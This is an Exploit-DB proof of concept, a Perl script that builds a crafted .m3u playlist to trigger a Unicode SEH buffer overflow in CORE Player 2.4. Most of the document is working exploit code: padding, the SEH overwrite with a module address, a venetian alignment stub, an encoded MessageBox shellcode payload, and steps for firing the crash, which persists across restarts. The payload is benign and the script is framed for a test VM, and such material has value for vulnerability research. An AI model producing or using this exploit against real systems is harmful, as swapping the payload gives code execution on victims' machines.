CORE MultiMedia Suite 2011 CORE Player 2.4 – ‘.m3u’ Local Buffer Overflow

  • 作者: Rh0
    日期: 2011-03-18
  • 来源:https://www.exploit-db.com/exploits/17001/
  • # Exploit: CORE Multimedia Suite 2011 CORE Player 2.4 Unicode SEH Buffer Overflow Exploit (.m3u)
    # Date: 18.03.11
    # Author: Rh0[at]z1p.biz
    # Software Link: http://mjm-soft.zzl.org/CORE_MMS_2011.zip
    # Version: 2.4
    # Tested on: WinXP Pro SP3 EN (VirtualBox)
    
    ## The application does not crash immediately:
    ## open Core Player, go to FILE->LOAD LIST, load the playlist and
    ## close the program. ==> Reopening it triggers the buffer overflow. <==
    ## The loaded playlist appears to be saved as Load.m3l in the
    ## program's directory, and every time the player is started that saved
    ## copy is parsed again and the overflow fires - so the crash persists
    ## across restarts until the file is removed.
    ## To be able to start the player normally, delete the Load.m3l file.
    
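    use strict;
    use warnings;

    ## Builds exploit.m3u in the current directory. The file itself is
    ## harmless until it is loaded into the vulnerable player; the overflow
    ## is only triggered on the player's *next* start, because the player
    ## persists the loaded list as Load.m3l in its own directory.
    ## Run this only against a disposable test VM.

    print " [*] Core Player 2.4 Unicode SEH Buffer Overflow Exploit [*] \n\n";

    my $outfile = "exploit.m3u";

    ## Filler: a drive prefix plus 533 padding bytes. 3 + 533 = 536 bytes,
    ## so the next two bytes land on the nSEH record.
    my $junk = "C:\\";
    $junk .= "A" x 533;         # 536 bytes until nseh overwrite

    ## The player widens the file content to Unicode (each byte becomes
    ## byte,0x00), so two file bytes become one 32-bit SEH slot. This is why
    ## the chosen addresses contain 0x00 bytes and still work.
    my $nseh = "\x90\xcf";      # becomes nop; add bh,cl (pad)
    my $seh  = "\x59\x4a";      # pop;pop;ret; unicode compatible, 0x004a0059 @ core player.exe
                                # NOTE: static address in the non-ASLR main module of this
                                # exact build (tested WinXP SP3 EN); other builds need their own.

    ## Venetian shellcode: every other byte is a 0x71 pad so that the
    ## inserted 0x00 bytes form harmless instructions. It rebuilds a
    ## pointer to the decoder in EAX and jumps to it.
    my $vSC =
    "\x71".                     #
    "\x58".                     # pop eax (eax should then be 0x0012CC14)
    "\x71".
    "\x5d".                     # pop ebp
    "\x71".
    "\xbb\x08\x41".             # mov ebx,0x41000800
    "\xf8".                     # add al,bh
    "\x71".
    "\xbb\x04\x41".             # mov ebx,0x41000400
    "\xfc".                     # add ah,bh   (eax should now point to the payload)
    "\x71".
    "\x50".                     # push eax
    "\x71".
    "\xc3";                     # return

    ## msf MessageBox alpha_mixed + unicode upper
    my $payload =
    "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAI".
    "AXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTIK0IKXNXYT".
    "0L4QJPJPJPJPJPJPJPJPJPJPJPJQ3PCPCPCPCQ3P7PRQIQZQ1PXR0P0Q1P0Q1RKQ1Q1PQP".
    "2Q1PBP2Q2PBP0PBPBQ1Q2PXR0P8Q1Q2CEPJQ9PXPYPXRKPMPKPNP9QBPTQ5CDQ9RDR4RQP".
    "ZRRPOQ2PCPGPEC1PKT9R2Q4PLPKPQQQPPP0PLPKQ3Q6QDPLPLPKR1C6PGRLPLPKPRQVPVQ".
    "XPNRKPCPNPQP0PNRKPVPVQ5QXPPPOQ7C8R2PUPXCCR1Q9PEPQQHR1PKPOQHC1PCR0PNRKR".
    "0RLR1P4PGQDPLPKQ3T5Q7PLPLPKPVP4PQP8PRPXPCP1QHQZPNRKPQPZPTQHPLPKQ3QZPGP".
    "PPCP1PZPKPKQCQ7Q4PQPYPLPKPGQ4PLPKPGT1PZPNQ5C1PIROQFR1PKRPPKPLPNPLPOCDQ".
    "9R0R2QDQ3P7Q9PQQJROPTPMR6QQPOP7PZPKQJPTQ7PKPCPLQ7R4Q7QHQ3Q5PIT1PNRKR0Q".
    "JPVQ4QFQQQJPKPCQFPLPKPVRLPPPKPLPKPQPJQ7RLPGT1PZPKPNRKQFQTPNRKR6QQQJPHP".
    "KP9R2QTQ7R4PGRLPCR1POP3POQ2R4PHPVQ9PNP4PORYQHQUPLPIPIPRQ5P8PNRNR0PNR4P".
    "NPXRLR0PRPMP8PMPOQ9ROPKPOQ9ROPOCIPCCEQFC4PMRKQ3PNQHR8QJPBR2QCPKP7Q5PLR".
    "6Q4QFP2PZQ8PLPNPIROQ9ROPIROPOCIPQR5Q7T8Q5P8PPRLPPRLQ5RPPRQQPQCHR0P3R0P".
    "2R4RNPEP4Q5P8R4P5PCQ3R2PER0T2PLQ8R1PLPGQDQ5QJPNQYPXQVPRCFPKPOQFP5Q7CDP".
    "KP9PKCBQFP0POPKPNPHQ9P2PPPMPMRLPKP7PEPLPGPTPQQ2PICHQ5P1PKPOPKPOPKPOPQT".
    "8Q5P4PRCHPERPPQP0Q3PXPPROQ5P9QDP4PEP5PEP8PRQUPPT8R0T0QBPLPPP1Q9PKPLQ8P".
    "CRLR1P4PVC9PMQIQHRCR1RXR1PHPERPPET0PQP0R2Q8Q3PYR2QDPET0Q5RZPPC8R0T8R0R".
    "PPRPLPPROR0RHPQT4R0C5PERPPPQ5R1RXPRPNR2PIPRC3PPROQBPHQBQUQ3T8R1P0PPPUP".
    "EP8Q3QEQDP2Q5RPQFP3PCR8R2RPPRPLPEP1R0RYR2PHPPROQ3Q2QBQ5PERPR1CHPGPPPEC".
    "JR1P0R0Q3PPP1PIR9PNC8R0PLQFPDPET4PKP9PMP1QDRQPNP2QBPJPCRPQBRSPRT1R6P2Q".
    "9ROPNP0QFR1POP0R6P0PKPOQ3C5Q7CHQ1Q1AA";

    ## Assemble the playlist: filler, nSEH, SEH, venetian stub, payload.
    my $buffer = $junk . $nseh . $seh . $vSC . $payload;

    ## Three-arg open with a lexical handle, every I/O step checked so a
    ## half-written or unwritable file does not go unnoticed. The buffer
    ## contains no 0x0A/0x0D bytes, but binmode guarantees a byte-exact
    ## write regardless of platform line-ending translation.
    open(my $fh, '>', $outfile)
        or die "Cannot create $outfile: $!\n";
    binmode($fh);
    print {$fh} $buffer
        or die "Cannot write $outfile: $!\n";
    close($fh)
        or die "Cannot close $outfile: $!\n";

    print " [*] Open Core Player\n";
    print " [*] Load the playlist exploit.m3u \n";
    print " [*] Close the program\n";
    print " [*] Reopen it\n";
    print " [*] A Messagebox should pop up.\n\n";
    ## Recovery hint: the player keeps the loaded list as Load.m3l in its
    ## install directory; delete that file if the player must start cleanly.
    print " [*] Enter to continue [*] ";
    <STDIN>;                    # read STDIN explicitly; <> would also open files named in @ARGV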